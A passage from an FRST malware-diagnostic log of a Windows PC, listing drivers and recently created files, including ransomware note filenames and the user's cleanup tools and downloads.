S3 RSUSBSTOR; C:\Windows\SysWOW64\Drivers\RtsUStor.sys [225280 2009-09-23] (Realtek Semiconductor Corp.)
R3 rtsuvc; C:\Windows\System32\DRIVERS\rtsuvc.sys [9101016 2014-12-11] (Realtek Semiconductor Corp.)
R2 sbapifs; C:\Windows\System32\DRIVERS\sbapifs.sys [88928 2013-10-01] (ThreatTrack Security, Inc.)
R3 SmbDrvI; C:\Windows\System32\DRIVERS\Smb_driver_Intel.sys [34544 2014-12-21] (Synaptics Incorporated)
S3 SRTSP; C:\Windows\System32\Drivers\NISx64\1207020.003\SRTSP64.SYS [744568 2011-03-31] (Symantec Corporation)
R1 SRTSPX; C:\Windows\system32\drivers\NISx64\1207020.003\SRTSPX64.SYS [40568 2011-03-31] (Symantec Corporation)
R0 SymDS; C:\Windows\System32\drivers\NISx64\1207020.003\SYMDS64.SYS [450680 2011-01-27] (Symantec Corporation)
R0 SymEFA; C:\Windows\System32\drivers\NISx64\1207020.003\SYMEFA64.SYS [912504 2011-03-15] (Symantec Corporation)
R3 SymEvent; C:\Windows\system32\Drivers\SYMEVENT64x86.SYS [174200 2014-06-16] (Symantec Corporation)
R1 SymIRON; C:\Windows\system32\drivers\NISx64\1207020.003\Ironx64.SYS [171128 2011-01-27] (Symantec Corporation)
R1 SymNetS; C:\Windows\System32\Drivers\NISx64\1207020.003\SYMNETS.SYS [386168 2011-04-21] (Symantec Corporation)
S3 WinRing0_1_2_0; No ImagePath
U3 catchme; \??\C:\ComboFix\catchme.sys [X]
 
==================== NetSvcs (Whitelisted) ===================
 
(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)
 
 
==================== One Month Created files and folders ========
 
(If an entry is included in the fixlist, the file/folder will be moved.)
 
2015-06-01 21:50 - 2015-06-01 21:50 - 00027331 _____ () C:\Users\Giovanni\Downloads\FRST.txt
2015-06-01 21:50 - 2015-06-01 21:50 - 00000000 ____D () C:\FRST
2015-06-01 21:49 - 2015-06-01 21:49 - 02108928 _____ (Farbar) C:\Users\Giovanni\Downloads\FRST64.exe
2015-06-01 21:49 - 2015-06-01 21:49 - 01147392 _____ (Farbar) C:\Users\Giovanni\Downloads\FRST.exe
2015-06-01 21:14 - 2015-06-01 21:30 - 00000000 ___SD () C:\ComboFix
2015-06-01 21:14 - 2011-06-26 08:45 - 00256000 _____ () C:\Windows\PEV.exe
2015-06-01 21:14 - 2010-11-07 19:20 - 00208896 _____ () C:\Windows\MBR.exe
2015-06-01 21:14 - 2009-04-20 06:56 - 00060416 _____ (NirSoft) C:\Windows\NIRCMD.exe
2015-06-01 21:14 - 2000-08-31 02:00 - 00518144 _____ (SteelWerX) C:\Windows\SWREG.exe
2015-06-01 21:14 - 2000-08-31 02:00 - 00406528 _____ (SteelWerX) C:\Windows\SWSC.exe
2015-06-01 21:14 - 2000-08-31 02:00 - 00098816 _____ () C:\Windows\sed.exe
2015-06-01 21:14 - 2000-08-31 02:00 - 00080412 _____ () C:\Windows\grep.exe
2015-06-01 21:14 - 2000-08-31 02:00 - 00068096 _____ () C:\Windows\zip.exe
2015-06-01 20:50 - 2015-06-01 21:14 - 00000000 ____D () C:\Qoobox
2015-06-01 20:47 - 2015-06-01 20:47 - 00000000 ____D () C:\Windows\erdnt
2015-06-01 20:46 - 2015-06-01 20:46 - 05628238 ____R (Swearware) C:\Users\Giovanni\Downloads\ComboFix.exe
2015-06-01 20:34 - 2015-06-01 20:34 - 00000000 ____D () C:\5e100decb1573396b5b43467defb2a
2015-06-01 20:33 - 2015-06-01 20:33 - 00001912 _____ () C:\Windows\epplauncher.mif
2015-06-01 20:30 - 2015-06-01 20:30 - 00002117 _____ () C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Microsoft Security Essentials.lnk
2015-06-01 20:29 - 2015-06-01 20:29 - 00079064 _____ (Malwarebytes Corporation) C:\Windows\system32\Drivers\bdpb.sys
2015-06-01 20:29 - 2015-06-01 20:29 - 00000000 ____D () C:\Program Files (x86)\Microsoft Security Client
2015-06-01 20:28 - 2015-06-01 20:30 - 00000000 ____D () C:\Program Files\Microsoft Security Client
2015-06-01 20:27 - 2015-06-01 20:33 - 00000000 ____D () C:\88ca8d9982f9f69a71
2015-06-01 20:26 - 2015-06-01 20:27 - 14259384 _____ (Microsoft Corporation) C:\Users\Giovanni\Downloads\mseinstall.exe
2015-06-01 20:26 - 2015-06-01 20:27 - 14259384 _____ (Microsoft Corporation) C:\Users\Giovanni\Downloads\mseinstall (1).exe
2015-06-01 20:23 - 2015-06-01 20:23 - 00000000 ____D () C:\Windows\system32\log
2015-06-01 20:23 - 2015-05-27 12:02 - 00053568 _____ (Elex do Brasil Participações Ltda) C:\Windows\system32\Drivers\iSafeKrnlBoot.sys
2015-06-01 20:23 - 2015-04-17 04:43 - 00052392 _____ (Elex do Brasil Participações Ltda) C:\Windows\system32\Drivers\iSafeNetFilter.sys
2015-06-01 20:22 - 2015-06-01 20:23 - 00000000 ____D () C:\ProgramData\Microsoft\Windows\Start Menu\Programs\YAC
2015-06-01 20:22 - 2015-06-01 20:22 - 00001902 _____ () C:\Users\Public\Desktop\YAC.lnk
2015-06-01 20:22 - 2015-06-01 20:22 - 00000000 ____D () C:\Users\Giovanni\AppData\Roaming\Elex-tech
2015-06-01 20:22 - 2015-06-01 20:22 - 00000000 ____D () C:\Program Files (x86)\Elex-tech
2015-06-01 20:21 - 2015-06-01 20:21 - 00000000 ____D () C:\Users\Giovanni\AppData\Roaming\eCyber
2015-06-01 20:20 - 2015-06-01 20:21 - 00864648 _____ () C:\Users\Giovanni\Downloads\yet_another_cleaner_sk_6130172.exe
2015-06-01 20:18 - 2015-06-01 20:18 - 00000000 ____D () C:\Users\Giovanni\AppData\Roaming\www.shadowexplorer.com
2015-06-01 20:17 - 2013-09-04 14:57 - 00031264 _____ (ThreatTrack Security) C:\Windows\system32\Drivers\gfiutil.sys
2015-06-01 20:17 - 2013-05-23 08:39 - 00041032 _____ (ThreatTrack Security) C:\Windows\system32\Drivers\gfiark.sys
2015-06-01 20:16 - 2015-06-01 20:16 - 00001885 _____ () C:\Users\Giovanni\Desktop\ShadowExplorer.lnk
2015-06-01 20:16 - 2015-06-01 20:16 - 00000000 ____D () C:\ProgramData\Microsoft\Windows\Start Menu\Programs\ShadowExplorer
2015-06-01 20:16 - 2015-06-01 20:16 - 00000000 ____D () C:\Program Files (x86)\ShadowExplorer
2015-06-01 20:14 - 2015-06-01 20:14 - 00969845 _____ (ShadowExplorer.com ) C:\Users\Giovanni\Downloads\ShadowExplorer-0.9-setup.exe
2015-06-01 20:11 - 2015-06-01 20:12 - 00000000 ____D () C:\Program Files\Recuva
2015-06-01 20:11 - 2015-06-01 20:11 - 00000000 ____D () C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Recuva
2015-06-01 20:10 - 2015-06-01 20:10 - 04426120 _____ (Piriform Ltd) C:\Users\Giovanni\Downloads\rcsetup152.exe
2015-06-01 20:08 - 2013-10-01 16:31 - 00063184 _____ (GFI Software) C:\Windows\system32\Drivers\sbhips.sys
2015-06-01 20:07 - 2015-06-01 20:07 - 00000000 ____D () C:\Users\Giovanni\AppData\Roaming\Enigma Software Group
2015-06-01 20:06 - 2015-06-01 20:50 - 00000000 ____D () C:\ProgramData\STOPzilla!
2015-06-01 20:06 - 2015-06-01 20:17 - 00000000 ____D () C:\Program Files (x86)\STOPzilla
2015-06-01 20:06 - 2015-06-01 20:06 - 00022704 _____ () C:\Windows\system32\Drivers\EsgScanner.sys
2015-06-01 20:06 - 2015-06-01 20:06 - 00003344 _____ () C:\Windows\System32\Tasks\SpyHunter4Startup
2015-06-01 20:06 - 2015-06-01 20:06 - 00001087 _____ () C:\Users\Giovanni\Desktop\SpyHunter.lnk
2015-06-01 20:06 - 2015-06-01 20:06 - 00000000 ____D () C:\sh4ldr
2015-06-01 20:06 - 2015-06-01 20:06 - 00000000 ____D () C:\ProgramData\Microsoft\Windows\Start Menu\Programs\STOPzilla
2015-06-01 20:06 - 2015-06-01 20:06 - 00000000 ____D () C:\Program Files\Enigma Software Group
2015-06-01 20:06 - 2013-10-01 16:31 - 00260816 _____ (GFI Software) C:\Windows\system32\Drivers\SbFw.sys
2015-06-01 20:06 - 2013-03-26 15:58 - 00120608 _____ (GFI Software) C:\Windows\system32\Drivers\SbFwIm.sys
2015-06-01 20:04 - 2015-06-01 20:04 - 03109248 _____ (Enigma Software Group USA, LLC.) C:\Users\Giovanni\Downloads\SpyHunter-Installer (2).exe
2015-06-01 20:03 - 2015-06-01 20:04 - 02042328 _____ (iS3, Inc.) C:\Users\Giovanni\Downloads\STOPzillaPRO_Downloader.exe
2015-06-01 19:58 - 2015-06-01 19:58 - 03109248 _____ (Enigma Software Group USA, LLC.) C:\Users\Giovanni\Downloads\SpyHunter-Installer (1).exe
2015-06-01 19:44 - 2015-06-01 19:44 - 03148854 _____ () C:\Users\Giovanni\Documents\!Decrypt-All-Files-xjryulf.bmp
2015-06-01 19:44 - 2015-06-01 19:44 - 00001322 _____ () C:\Users\Giovanni\Documents\!Decrypt-All-Files-xjryulf.txt
2015-06-01 19:29 - 2015-06-01 19:44 - 00827977 _____ () C:\ProgramData\zvcisfg.html
2015-06-01 19:26 - 2015-06-01 19:26 - 00002872 _____ () C:\Windows\System32\Tasks\rpzbcmg
2015-06-01 19:26 - 2015-06-01 19:26 - 00000000 ___HD () C:\95da42f1
2015-06-01 19:14 - 2015-06-01 19:14 - 00000000 ____D () C:\Users\Giovanni\AppData\Local\UXFmedia
2015-06-01 19:13 - 2015-06-01 19:13 - 00000000 ____D () C:\Users\Giovanni\AppData\Local\YgfnPack
2015-06-01 17:31 - 2015-06-01 18:00 - 00000000 ____D () C:\Users\Giovanni\Downloads\Fury 2014
2015-06-01 09:20 - 2015-06-01 09:20 - 00000000 ____D () C:\Users\Giovanni\AppData\Local\GWX
2015-05-26 11:50 - 2015-05-26 11:50 - 00000000 ____D () C:\Windows\System32\Tasks\Games
2015-05-25 08:27 - 2015-06-01 09:04 - 00000784 _____ () C:\Windows\setupact.log
2015-05-25 08:27 - 2015-05-25 08:27 - 00000000 _____ () C:\Windows\setuperr.log
2015-05-25 08:26 - 2015-05-25 08:26 - 00005110 _____ () C:\Windows\PFRO.log
2015-05-25 08:26 - 2015-05-25 08:26 - 00000000 ____H () C:\asc_rdflag
2015-05-19 11:11 - 2015-05-19 11:11 - 01513488 _____ (Dummy, Ltd.) C:\Users\Giovanni\Downloads\rulers of nations geopolitical simulator 2_10924_i9759006_il345.exe
2015-05-19 11:11 - 2015-05-19 11:11 - 00019991 _____ () C:\Users\Giovanni\Downloads\Surgeon.Simulator.2013..April.19..2013..torrent
2015-05-19 08:26 - 2015-05-01 15:17 - 00124112 _____ (Microsoft Corporation) C:\Windows\system32\PresentationCFFRasterizerNative_v0300.dll
2015-05-19 08:26 - 2015-05-01 15:16 - 00102608 _____ (Microsoft Corporation) C:\Windows\SysWOW64\PresentationCFFRasterizerNative_v0300.dll
2015-05-16 09:44 - 2015-05-05 03:29 - 00342016 _____ (Microsoft Corporation) C:\Windows\system32\schannel.dll
2015-05-16 09:43 - 2015-05-05 03:12 - 00248832 _____ (Microsoft Corporation) C:\Windows\SysWOW64\schannel.dll
2015-05-16 09:43 - 2015-04-18 05:10 - 00460800 _____ (Microsoft Corporation) C:\Windows\system32\certcli.dll
2015-05-16 09:43 - 2015-04-18 04:56 - 00342016 _____ (Microsoft Corporation) C:\Windows\SysWOW64\certcli.dll
2015-05-16 09:42 - 2015-04-22 04:28 - 00389840 _____ (Microsoft Corporation) C:\Windows\system32\iedkcs32.dll
2015-05-16 09:42 - 2015-04-22 03:48 - 00342736 _____ (Microsoft Corporation) C:\Windows\SysWOW64\iedkcs32.dll
2015-05-16 09:42 - 2015-04-21 19:14 - 24971776 _____ (Microsoft Corporation) C:\Windows\system32\mshtml.dll
2015-05-16 09:42 - 2015-04-21 19:08 - 02724864 _____ (Microsoft Corporation) C:\Windows\system32\mshtml.tlb
2015-05-16 09:42 - 2015-04-21 19:07 - 00004096 _____ (Microsoft Corporation) C:\Windows\system32\ieetwcollectorres.dll
2015-05-16 09:42 - 2015-04-21 18:51 - 00066560 _____ (Microsoft Corporation) C:\Windows\system32\iesetup.dll
2015-05-16 09:42 - 2015-04-21 18:50 - 00584192 _____ (Microsoft Corporation) C:\Windows\system32\vbscript.dll
2015-05-16 09:42 - 2015-04-21 18:50 - 00417792 _____ (Microsoft Corporation) C:\Windows\system32\html.iec
2015-05-16 09:42 - 2015-04-21 18:50 - 00048640 _____ (Microsoft Corporation) C:\Windows\system32\ieetwproxystub.dll
2015-05-16 09:42 - 2015-04-21 18:49 - 02885120 _____ (Microsoft Corporation) C:\Windows\system32\iertutil.dll
2015-05-16 09:42 - 2015-04-21 18:48 - 00088064 _____ (Microsoft Corporation) C:\Windows\system32\MshtmlDac.dll
2015-05-16 09:42 - 2015-04-21 18:41 - 00054784 _____ (Microsoft Corporation) C:\Windows\system32\jsproxy.dll
2015-05-16 09:42 - 2015-04-21 18:40 - 00034304 _____ (Microsoft Corporation) C:\Windows\system32\iernonce.dll
2015-05-16 09:42 - 2015-04-21 18:37 - 00633856 _____ (Microsoft Corporation) C:\Windows\system32\ieui.dll
2015-05-16 09:42 - 2015-04-21 18:35 - 00816640 _____ (Microsoft Corporation) C:\Windows\system32\jscript.dll
2015-05-16 09:42 - 2015-04-21 18:35 - 00144384 _____ (Microsoft Corporation) C:\Windows\system32\ieUnatt.exe
2015-05-16 09:42 - 2015-04-21 18:35 - 00114688 _____ (Microsoft Corporation) C:\Windows\system32\ieetwcollector.exe
2015-05-16 09:42 - 2015-04-21 18:34 - 00814080 _____ (Microsoft Corporation) C:\Windows\system32\jscript9diag.dll
2015-05-16 09:42 - 2015-04-21 18:31 - 06025728 _____ (Microsoft Corporation) C:\Windows\system32\jscript9.dll
2015-05-16 09:42 - 2015-04-21 18:26 - 00968704 _____ (Microsoft Corporation) C:\Windows\system32\MsSpellCheckingFacility.exe
2015-05-16 09:42 - 2015-04-21 18:25 - 02724864 _____ (Microsoft Corporation) C:\Windows\SysWOW64\mshtml.tlb
2015-05-16 09:42 - 2015-04-21 18:24 - 19691008 _____ (Microsoft Corporation) C:\Windows\SysWOW64\mshtml.dll
2015-05-16 09:42 - 2015-04-21 18:22 - 00490496 _____ (Microsoft Corporation) C:\Windows\system32\dxtmsft.dll
2015-05-16 09:42 - 2015-04-21 18:14 - 00077824 _____ (Microsoft Corporation) C:\Windows\system32\JavaScriptCollectionAgent.dll
2015-05-16 09:42 - 2015-04-21 18:11 - 00504320 _____ (Microsoft Corporation) C:\Windows\SysWOW64\vbscript.dll
2015-05-16 09:42 - 2015-04-21 18:11 - 00062464 _____ (Microsoft Corporation) C:\Windows\SysWOW64\iesetup.dll
2015-05-16 09:42 - 2015-04-21 18:10 - 00047616 _____ (Microsoft Corporation) C:\Windows\SysWOW64\ieetwproxystub.dll
2015-05-16 09:42 - 2015-04-21 18:09 - 00341504 _____ (Microsoft Corporation) C:\Windows\SysWOW64\html.iec
2015-05-16 09:42 - 2015-04-21 18:09 - 00199680 _____ (Microsoft Corporation) C:\Windows\system32\msrating.dll
2015-05-16 09:42 - 2015-04-21 18:08 - 00092160 _____ (Microsoft Corporation) C:\Windows\system32\mshtmled.dll
2015-05-16 09:42 - 2015-04-21 18:08 - 00064000 _____ (Microsoft Corporation) C:\Windows\SysWOW64\MshtmlDac.dll
2015-05-16 09:42 - 2015-04-21 18:05 - 00316928 _____ (Microsoft Corporation) C:\Windows\system32\dxtrans.dll
2015-05-16 09:42 - 2015-04-21 18:04 - 02278400 _____ (Microsoft Corporation) C:\Windows\SysWOW64\iertutil.dll
2015-05-16 09:42 - 2015-04-21 18:03 - 00047104 _____ (Microsoft Corporation) C:\Windows\SysWOW64\jsproxy.dll
2015-05-16 09:42 - 2015-04-21 18:02 - 00030720 _____ (Microsoft Corporation) C:\Windows\SysWOW64\iernonce.dll
2015-05-16 09:42 - 2015-04-21 18:00 - 00478208 _____ (Microsoft Corporation) C:\Windows\SysWOW64\ieui.dll
2015-05-16 09:42 - 2015-04-21 17:58 - 00664576 _____ (Microsoft Corporation) C:\Windows\SysWOW64\jscript.dll
2015-05-16 09:42 - 2015-04-21 17:58 - 00115712 _____ (Microsoft Corporation) C:\Windows\SysWOW64\ieUnatt.exe
2015-05-16 09:42 - 2015-04-21 17:57 - 00620032 _____ (Microsoft Corporation) C:\Windows\SysWOW64\jscript9diag.dll
2015-05-16 09:42 - 2015-04-21 17:49 - 00801280 _____ (Microsoft Corporation) C:\Windows\system32\msfeeds.dll
2015-05-16 09:42 - 2015-04-21 17:49 - 00720384 _____ (Microsoft Corporation) C:\Windows\system32\ie4uinit.exe
2015-05-16 09:42 - 2015-04-21 17:48 - 00418304 _____ (Microsoft Corporation) C:\Windows\SysWOW64\dxtmsft.dll
2015-05-16 09:42 - 2015-04-21 17:47 - 01359360 _____ (Microsoft Corporation) C:\Windows\system32\mshtmlmedia.dll
2015-05-16 09:42 - 2015-04-21 17:46 - 02125824 _____ (Microsoft Corporation) C:\Windows\system32\inetcpl.cpl
2015-05-16 09:42 - 2015-04-21 17:43 - 00060416 _____ (Microsoft Corporation) C:\Windows\SysWOW64\JavaScriptCollectionAgent.dll
2015-05-16 09:42 - 2015-04-21 17:40 - 14401536 _____ (Microsoft Corporation) C:\Windows\system32\ieframe.dll
2015-05-16 09:42 - 2015-04-21 17:39 - 00168960 _____ (Microsoft Corporation) C:\Windows\SysWOW64\msrating.dll
2015-05-16 09:42 - 2015-04-21 17:38 - 00076288 _____ (Microsoft Corporation) C:\Windows\SysWOW64\mshtmled.dll
2015-05-16 09:42 - 2015-04-21 17:36 - 00285696 _____ (Microsoft Corporation) C:\Windows\SysWOW64\dxtrans.dll
2015-05-16 09:42 - 2015-04-21 17:31 - 04305920 _____ (Microsoft Corporation) C:\Windows\SysWOW64\jscript9.dll
2015-05-16 09:42 - 2015-04-21 17:27 - 02352128 _____ (Microsoft Corporation) C:\Windows\system32\wininet.dll
2015-05-16 09:42 - 2015-04-21 17:26 - 00688640 _____ (Microsoft Corporation) C:\Windows\SysWOW64\msfeeds.dll
2015-05-16 09:42 - 2015-04-21 17:25 - 02052608 _____ (Microsoft Corporation) C:\Windows\SysWOW64\inetcpl.cpl
2015-05-16 09:42 - 2015-04-21 17:24 - 01155072 _____ (Microsoft Corporation) C:\Windows\SysWOW64\mshtmlmedia.dll
2015-05-16 09:42 - 2015-04-21 17:17 - 12828672 _____ (Microsoft Corporation) C:\Windows\SysWOW64\ieframe.dll
2015-05-16 09:42 - 2015-04-21 17:15 - 01547264 _____ (Microsoft Corporation) C:\Windows\system32\urlmon.dll
2015-05-16 09:42 - 2015-04-21 17:03 - 00800768 _____ (Microsoft Corporation) C:\Windows\system32\ieapfltr.dll
2015-05-16 09:42 - 2015-04-21 17:02 - 01882112 _____ (Microsoft Corporation) C:\Windows\SysWOW64\wininet.dll
2015-05-16 09:42 - 2015-04-21 16:58 - 01310208 _____ (Microsoft Corporation) C:\Windows\SysWOW64\urlmon.dll
2015-05-16 09:42 - 2015-04-21 16:56 - 00710144 _____ (Microsoft Corporation) C:\Windows\SysWOW64\ieapfltr.dll
2015-05-16 09:41 - 2015-04-20 05:17 - 01647104 _____ (Microsoft Corporation) C:\Windows\system32\DWrite.dll
2015-05-16 09:41 - 2015-04-20 05:17 - 01179136 _____ (Microsoft Corporation) C:\Windows\system32\FntCache.dll
2015-05-16 09:41 - 2015-04-20 04:56 - 01250816 _____ (Microsoft Corporation) C:\Windows\SysWOW64\DWrite.dll
2015-05-16 09:41 - 2015-04-20 04:11 - 03204608 _____ (Microsoft Corporation) C:\Windows\system32\win32k.sys
2015-05-16 09:41 - 2015-04-13 05:28 - 00328704 _____ (Microsoft Corporation) C:\Windows\system32\services.exe
2015-05-16 09:41 - 2015-04-08 05:29 - 00275456 _____ (Microsoft Corporation) C:\Windows\system32\InkEd.dll
2015-05-16 09:41 - 2015-04-08 05:14 - 00216064 _____ (Microsoft Corporation) C:\Windows\SysWOW64\InkEd.dll
2015-05-13 18:08 - 2015-06-01 19:30 - 00000000 ____D () C:\Users\Giovanni\Documents\Masters of the World
2015-05-13 18:05 - 2015-06-01 19:28 - 00000000 ____D () C:\Program Files (x86)\Xvid
2015-05-13 18:05 - 2015-05-13 18:05 - 00000000 ____D () C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Xvid
2015-05-13 18:05 - 2011-05-30 15:42 - 00255488 _____ () C:\Windows\system32\xvidvfw.dll
2015-05-13 18:05 - 2011-05-30 15:42 - 00240640 _____ () C:\Windows\SysWOW64\xvidvfw.dll
2015-05-13 18:05 - 2011-05-23 11:52 - 00153088 _____ () C:\Windows\SysWOW64\xvid.ax
2015-05-13 18:05 - 2011-05-23 09:49 - 00173568 _____ () C:\Windows\system32\xvid.ax
2015-05-13 18:05 - 2011-05-23 09:46 - 00645632 _____ () C:\Windows\SysWOW64\xvidcore.dll
2015-05-13 18:05 - 2011-05-23 09:45 - 00696832 _____ () C:\Windows\system32\xvidcore.dll
2015-05-13 18:04 - 2015-05-13 18:10 - 00000000 ____D () C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Masters of the World
2015-05-13 18:04 - 2015-05-13 18:07 - 00601847 _____ () C:\Windows\MOW 2013 ENGLISH DL Uninstaller.exe
2015-05-13 18:04 - 2015-05-13 18:04 - 00001977 _____ () C:\Users\Public\Desktop\Masters of the World.lnk
2015-05-13 18:03 - 2015-06-01 19:43 - 00000000 ____D () C:\Program Files (x86)\Masters of the World
2015-05-13 17:42 - 2015-05-13 17:46 - 00000000 ____D () C:\Users\Giovanni\Downloads\Masters.Of.The.World.Geopolitical.Simulator.3.PROPER-CPY
2015-05-13 17:39 - 2015-05-13 17:39 - 00018491 _____ () C:\Users\Giovanni\Downloads\masters-of-the-world-geopolitical-simulator-3-englishpcdvdskidrowwwwgamestorrentsco..torrent
2015-05-11 16:42 - 2015-05-11 16:42 - 00100716 _____ () C:\Users\Giovanni\Downloads\Cass._pen._2014_su_operazioni_dolose.htm
2015-05-11 12:33 - 2015-05-11 12:33 - 00241328 _____ () C:\Users\Giovanni\Downloads\Responsabilità_amministratori_privi_di_delega_-_Conoscenza_-_Conoscibilità.htm
2015-05-11 12:33 - 2015-05-11 12:33 - 00077420 _____ () C:\Users\Giovanni\Downloads\C.d.A._Responsabilità_degli_amministratori_privi_di_delega.htm
2015-05-10 09:33 - 2015-05-10 09:33 - 05569984 _____ (Microsoft Corporation) C:\Windows\system32\ntoskrnl.exe
2015-05-10 09:33 - 2015-05-10 09:33 - 03989440 _____ (Microsoft Corporation) C:\Windows\SysWOW64\ntkrnlpa.exe
2015-05-10 09:33 - 2015-05-10 09:33 - 03934144 _____ (Microsoft Corporation) C:\Windows\SysWOW64\ntoskrnl.exe
2015-05-10 09:33 - 2015-05-10 09:33 - 01728960 _____ (Microsoft Corporation) C:\Windows\system32\ntdll.dll
2015-05-10 09:33 - 2015-05-10 09:33 - 01461760 _____ (Microsoft Corporation) C:\Windows\system32\lsasrv.dll
2015-05-10 09:33 - 2015-05-10 09:33 - 01310744 _____ (Microsoft Corporation) C:\Windows\SysWOW64\ntdll.dll
2015-05-10 09:33 - 2015-05-10 09:33 - 01254400 _____ (Microsoft Corporation) C:\Windows\system32\diagtrack.dll
2015-05-10 09:33 - 2015-05-10 09:33 - 01162752 _____ (Microsoft Corporation) C:\Windows\system32\kernel32.dll
2015-05-10 09:33 - 2015-05-10 09:33 - 01114112 _____ (Microsoft Corporation) C:\Windows\SysWOW64\kernel32.dll
2015-05-10 09:33 - 2015-05-10 09:33 - 00879104 _____ (Microsoft Corporation) C:\Windows\system32\tdh.dll
2015-05-10 09:33 - 2015-05-10 09:33 - 00879104 _____ (Microsoft Corporation) C:\Windows\system32\advapi32.dll
2015-05-10 09:33 - 2015-05-10 09:33 - 00728064 _____ (Microsoft Corporation) C:\Windows\system32\kerberos.dll
2015-05-10 09:33 - 2015-05-10 09:33 - 00686080 _____ (Microsoft Corporation) C:\Windows\SysWOW64\adtschema.dll
2015-05-10 09:33 - 2015-05-10 09:33 - 00686080 _____ (Microsoft Corporation) C:\Windows\system32\adtschema.dll
2015-05-10 09:33 - 2015-05-10 09:33 - 00641536 _____ (Microsoft Corporation) C:\Windows\SysWOW64\advapi32.dll
2015-05-10 09:33 - 2015-05-10 09:33 - 00635392 _____ (Microsoft Corporation) C:\Windows\SysWOW64\tdh.dll
2015-05-10 09:33 - 2015-05-10 09:33 - 00550912 _____ (Microsoft Corporation) C:\Windows\SysWOW64\kerberos.dll
2015-05-10 09:33 - 2015-05-10 09:33 - 00503808 _____ (Microsoft Corporation) C:\Windows\system32\srcore.dll
2015-05-10 09:33 - 2015-05-10 09:33 - 00424448 _____ (Microsoft Corporation) C:\Windows\system32\KernelBase.dll
2015-05-10 09:33 - 2015-05-10 09:33 - 00404992 _____ (Microsoft Corporation) C:\Windows\system32\tracerpt.exe
2015-05-10 09:33 - 2015-05-10 09:33 - 00364544 _____ (Microsoft Corporation) C:\Windows\SysWOW64\tracerpt.exe
2015-05-10 09:33 - 2015-05-10 09:33 - 00362496 _____ (Microsoft Corporation) C:\Windows\system32\wow64win.dll
2015-05-10 09:33 - 2015-05-10 09:33 - 00338432 _____ (Microsoft Corporation) C:\Windows\system32\conhost.exe
2015-05-10 09:33 - 2015-05-10 09:33 - 00314880 _____ (Microsoft Corporation) C:\Windows\system32\msv1_0.dll
2015-05-10 09:33 - 2015-05-10 09:33 - 00309760 _____ (Microsoft Corporation) C:\Windows\system32\ncrypt.dll
2015-05-10 09:33 - 2015-05-10 09:33 - 00296960 _____ (Microsoft Corporation) C:\Windows\system32\rstrui.exe
2015-05-10 09:33 - 2015-05-10 09:33 - 00274944 _____ (Microsoft Corporation) C:\Windows\SysWOW64\KernelBase.dll
2015-05-10 09:33 - 2015-05-10 09:33 - 00259584 _____ (Microsoft Corporation) C:\Windows\SysWOW64\msv1_0.dll
2015-05-10 09:33 - 2015-05-10 09:33 - 00243712 _____ (Microsoft Corporation) C:\Windows\system32\wow64.dll
2015-05-10 09:33 - 2015-05-10 09:33 - 00221184 _____ (Microsoft Corporation) C:\Windows\SysWOW64\ncrypt.dll
2015-05-10 09:33 - 2015-05-10 09:33 - 00215040 _____ (Microsoft Corporation) C:\Windows\system32\winsrv.dll
2015-05-10 09:33 - 2015-05-10 09:33 - 00210944 _____ (Microsoft Corporation) C:\Windows\system32\wdigest.dll
2015-05-10 09:33 - 2015-05-10 09:33 - 00172032 _____ (Microsoft Corporation) C:\Windows\SysWOW64\wdigest.dll
2015-05-10 09:33 - 2015-05-10 09:33 - 00155584 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\ksecpkg.sys
2015-05-10 09:33 - 2015-05-10 09:33 - 00146432 _____ (Microsoft Corporation) C:\Windows\SysWOW64\msaudite.dll
2015-05-10 09:33 - 2015-05-10 09:33 - 00146432 _____ (Microsoft Corporation) C:\Windows\system32\msaudite.dll
2015-05-10 09:33 - 2015-05-10 09:33 - 00136192 _____ (Microsoft Corporation) C:\Windows\system32\sspicli.dll
2015-05-10 09:33 - 2015-05-10 09:33 - 00113664 _____ (Microsoft Corporation) C:\Windows\system32\sechost.dll
2015-05-10 09:33 - 2015-05-10 09:33 - 00112640 _____ (Microsoft Corporation) C:\Windows\system32\smss.exe
2015-05-10 09:33 - 2015-05-10 09:33 - 00104448 _____ (Microsoft Corporation) C:\Windows\system32\logman.exe
2015-05-10 09:33 - 2015-05-10 09:33 - 00096768 _____ (Microsoft Corporation) C:\Windows\SysWOW64\sspicli.dll
2015-05-10 09:33 - 2015-05-10 09:33 - 00095680 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\ksecdd.sys
2015-05-10 09:33 - 2015-05-10 09:33 - 00092160 _____ (Microsoft Corporation) C:\Windows\SysWOW64\sechost.dll
2015-05-10 09:33 - 2015-05-10 09:33 - 00086528 _____ (Microsoft Corporation) C:\Windows\system32\TSpkg.dll
2015-05-10 09:33 - 2015-05-10 09:33 - 00082944 _____ (Microsoft Corporation) C:\Windows\SysWOW64\logman.exe
2015-05-10 09:33 - 2015-05-10 09:33 - 00065536 _____ (Microsoft Corporation) C:\Windows\SysWOW64\TSpkg.dll
2015-05-10 09:33 - 2015-05-10 09:33 - 00064000 _____ (Microsoft Corporation) C:\Windows\system32\auditpol.exe
2015-05-10 09:33 - 2015-05-10 09:33 - 00060416 _____ (Microsoft Corporation) C:\Windows\SysWOW64\msobjs.dll
2015-05-10 09:33 - 2015-05-10 09:33 - 00060416 _____ (Microsoft Corporation) C:\Windows\system32\msobjs.dll
2015-05-10 09:33 - 2015-05-10 09:33 - 00050176 _____ (Microsoft Corporation) C:\Windows\SysWOW64\auditpol.exe
2015-05-10 09:33 - 2015-05-10 09:33 - 00050176 _____ (Microsoft Corporation) C:\Windows\system32\srclient.dll
2015-05-10 09:33 - 2015-05-10 09:33 - 00047104 _____ (Microsoft Corporation) C:\Windows\system32\typeperf.exe
2015-05-10 09:33 - 2015-05-10 09:33 - 00043520 _____ (Microsoft Corporation) C:\Windows\system32\csrsrv.dll
2015-05-10 09:33 - 2015-05-10 09:33 - 00043008 _____ (Microsoft Corporation) C:\Windows\SysWOW64\srclient.dll
2015-05-10 09:33 - 2015-05-10 09:33 - 00043008 _____ (Microsoft Corporation) C:\Windows\system32\relog.exe
2015-05-10 09:33 - 2015-05-10 09:33 - 00040448 _____ (Microsoft Corporation) C:\Windows\SysWOW64\typeperf.exe
2015-05-10 09:33 - 2015-05-10 09:33 - 00037888 _____ (Microsoft Corporation) C:\Windows\SysWOW64\relog.exe
